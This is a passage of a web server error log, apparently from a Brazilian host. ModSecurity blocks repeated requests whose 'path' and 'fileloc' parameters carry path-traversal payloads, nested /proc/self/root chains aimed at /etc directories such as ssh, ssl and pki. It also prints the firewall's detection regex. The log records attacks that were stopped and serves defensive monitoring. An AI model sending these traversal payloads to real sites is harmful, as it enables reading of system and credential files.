[Thu Mar 19 05:18:23.819305 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:57714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxT8df6f5d65gmYZRHAAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:19:10.792769 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.243.128:57282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxfuyqAr6etmhZHNo3jwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:19:19.411561 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:54140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxh_u8EFLIOrSqIptyngAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:19:24.614967 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:57530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxjAbLMZ6AikZjR9UxHwAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 05:19:28.861459 2026] [:error] [pid 30077:tid 140411540502272] [client 216.73.216.191:5498] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxkPu8EFLIOrSqIptyqAAAAlg"]
[Thu Mar 19 05:19:28.959063 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:52778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxkBkFeYa1D6dYQnDCigAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:19:54.527512 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:46594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxqhkFeYa1D6dYQnDCsgAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:17.755313 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:50342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxwQbLMZ6AikZjR9UxPQAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:20:21.292547 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:33382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxxfu8EFLIOrSqIpty2AAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:25.423412 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:45814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxyeyqAr6etmhZHNo3rQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:26.743203 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:45820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxyuyqAr6etmhZHNo3rgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:30.130174 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:45822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxzuoXxyEfFpUF8f_khQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:31.440717 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:37002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuxzwkwaGbbGflqUZCKpQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:35.001130 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:37018] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux0l_V7PWP6ixUYl6PoQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:20:37.652431 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:37032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux1AkwaGbbGflqUZCKqQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 05:21:02.871247 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:37038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux7sdf6f5d65gmYZRHfAAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:04.819074 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:59772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux8P-YZRR_7pZ7nDJh2QAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:06.215559 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.243.128:59786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux8l_V7PWP6ixUYl6PqQAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:07.548024 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:59798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux8_-YZRR_7pZ7nDJh2gAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:08.875217 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:59802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux9Na6ubjKNq_cu4YXMAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:11.256449 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.243.128:43520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux9wbLMZ6AikZjR9UxVQAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:12.655493 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.243.128:43526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abux-P-YZRR_7pZ7nDJh4AAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:21:13.942918 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:43536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 